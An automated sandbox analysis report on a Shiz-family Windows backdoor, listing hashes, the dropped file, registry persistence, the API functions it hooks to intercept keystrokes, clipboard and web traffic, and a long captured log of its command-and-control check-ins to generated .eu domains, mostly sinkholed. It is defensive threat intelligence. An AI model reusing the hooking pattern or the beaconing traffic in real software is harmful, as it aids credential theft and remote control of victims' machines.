Gen.Heur.Zybut.1_2786cbabcd

by malwarelabrobot on November 21st, 2015 in Malware Descriptions.

HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Heur.Zybut.1 (B) (Emsisoft), Gen:Heur.Zybut.1 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 2786cbabcd57f37bc167ceb8a7c6de6c
SHA1: 8ab8c1f4da624c6863c18e4d0eaaa31155084cf8
SHA256: 9b885c3d036a2f94b2352322383e6799aecb038d539f48054b91cc393168f725
SSDeep: 6144:BgiD9CmFlaRUdduv9sZIUlfxryHfvau9hHoyrnETB2ebz:T9C3N2ZIUl4/njr8B2Yz
Size: 263680 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2008-01-10 22:31:36
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables remote control of the victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:1616

The Backdoor injects its code into the following process(es):

Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1616 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%System%\config\software (3251 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)
%WinDir%\AppPatch\jsvlax.exe (1951 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1616 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 57 EC 37 72 FE 84 78 F8 19 E4 84 17 62 F0 2E"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\jsvlax.exe_, \??\%WinDir%\apppatch\jsvlax.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = [binary data; non-printable bytes not shown]

Dropped PE files

MD5 File path
91f2d8066a31de887e48e30545ce8816 c:\WINDOWS\AppPatch\jsvlax.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Backdoor installs the following user-mode hooks in CRYPT32.dll:

CertVerifyCertificateChainPolicy

The Backdoor installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle

The Backdoor installs the following user-mode hooks in USER32.dll:

GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage

The Backdoor installs the following user-mode hooks in ADVAPI32.dll:

CryptEncrypt

The Backdoor installs the following user-mode hooks in WS2_32.dll:

WSASend
recv
gethostbyname
WSARecv
send

The Backdoor installs the following user-mode hooks in kernel32.dll:

CreateFileW

Propagation

VersionInfo

Company Name: flouncey
Product Name: Canorousness
Product Version: 1.7.4.9
Legal Copyright: Knitter
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3.8.7.1
File Description: africanthropus
Comments:
Language: English (United States)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
UPX1    4096             3381          3584      4.11995  5ca8758b50bde507e627becdf44a6897
.text   8192             18397         18432     4.10307  d3d0964c061dc60f7916c3972277c4a6
.b      28672            67171         2048      4.03977  0e8429d2ddee1efcf0d0af1ab7fab5ed
.rdata  98304            27457         1536      2.88669  68e2621575b0ea1d4e93cd3680b56226
.edata  126976           114375        76288     5.53033  0a8c26a3a29305690056c6cd49665ea4
.data   241664           285014        6656      5.15793  5567b42cb2577da1dff07341a38ec095
.edata  528384           192535        146432    5.53186  1434184dc08b2c631cb66d45420529d0
.tXJuJ  724992           633252        4608      0        b1e27aa018409de6bfd73f8afb883a65
.rsrc   1359872          2572          3072      3.70019  f55779d590a38be7408c663b2921f237

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
f331d7b25b956ea87d59ad294c0a9060
4790b969fbec046133f300fe459f8f0d

URLs


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Win32.Shiz.fxm/Agent-TBT Checkin
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
ET TROJAN Possible Compromised Host Sinkhole Cookie Value Snkz
ET TROJAN Known Sinkhole Response Header

Traffic

GET /domain/fodakyhijyv.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu
Location: hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40
3e..Go hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40..0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/marytymenok.eu
Set-Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:35 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.tufecagemyl.eu
Vary: Accept-Encoding


GET /domain/nojejecebuw.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu
Location: hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a
3e..Go hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a..0..


GET /domain/qeqinuqypoq.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu
Location: hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e
3e..Go hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e..0..


GET /be7c0ab0ac1acf15c755867799d818c8 HTTP/1.1
Host: xsso.lyvejujolec.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu
19..Landed lyvejujolec.eu<br>..0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/tucyguqaciq.eu
Set-Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


GET /daf1516824a145639bf41787e2765d81 HTTP/1.1
Host: xsso.gatedyhavyd.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu
19..Landed gatedyhavyd.eu<br>..0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:08 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.
<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.
<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.
....



POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:40 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.vocakemenir.eu
Vary: Accept-Encoding


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/rynazuqihoj.eu
Set-Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:35 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.mamixikusah.eu
Vary: Accept-Encoding


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Fri, 20 Nov 2015 09:10:30 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..
<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..
<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..
<!-- a padding to disable MSIE and Chrome friendly error page -->..
<!-- a padding to disable MSIE and Chrome friendly error page -->..
<!-- a padding to disable MSIE and Chrome friendly error page -->..
<!-- a padding to disable MSIE and Chrome friendly error page -->..
<!-- a padding to disable MSIE and Chrome friendly error page -->..
<!-- a padding to disable MSIE and Chrome friendly error page -->..
....



<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/fodakyhijyv.eu
Set-Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.ryleryqacic.eu
Vary: Accept-Encoding


GET /367a5a5db4f631d0cc1ad3c79b85b63a HTTP/1.1
Host: xsso.nojejecebuw.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu
19..Landed nojejecebuw.eu<br>..0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/vofozymufok.eu
Set-Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.vocakemenir.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.qetuluvolos.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:14 GMT
Server: Apache
Set-Cookie: vsid=914vr1955561546911765; expires=Wed, 18-Nov-2020 09:09:14 GMT; path=/; domain=ww92.qetuluvolos.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FdfVp3qmd7GRqViRDr1/BuqYVKM/PT/wsExrtIQCWY5wMO8yc/A6wGeskiiH45fFPSkQqlGjcss4YTmqvh20rA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

GET /1acef55da687a834a563e6c7f72341c6 HTTP/1.1
Host: xsso.kemocujufys.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu
19..Landed kemocujufys.eu<br>..0..


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.pupujeguper.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:40 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.ryhuzilywax.eu
Vary: Accept-Encoding



POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:42 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.ryhuzilywax.eu
Vary: Accept-Encoding


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.kevedorozup.eu
Vary: Accept-Encoding


GET /domain/nopegymozow.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu
Location: hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65
3e..Go hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65..0.
.


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.digusebyvad.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:19:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

GET /56531f80c1f00a0d974859702a1ece40 HTTP/1.1
Host: xsso.fodakyhijyv.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu
19..Landed fodakyhijyv.eu<br>..0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:33 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.puregivytoh.eu
Vary: Accept-Encoding


GET /domain/ciliqikytec.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu
Location: hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38
3e..Go hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38..0.
.


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.qexofyqihid.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:07 GMT
Server: Apache
Set-Cookie: vsid=923vr1955561476019761; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.qexofyqihid.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lxGQnIqPOObSvpRYhIBExqLbnpqaCDaWB5CI8dJz0yNx3DyRMOZdcOV5tGiCkFN10nldNwse8nilDEMF/BQpMg==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=46
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/lyvejujolec.eu
Set-Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


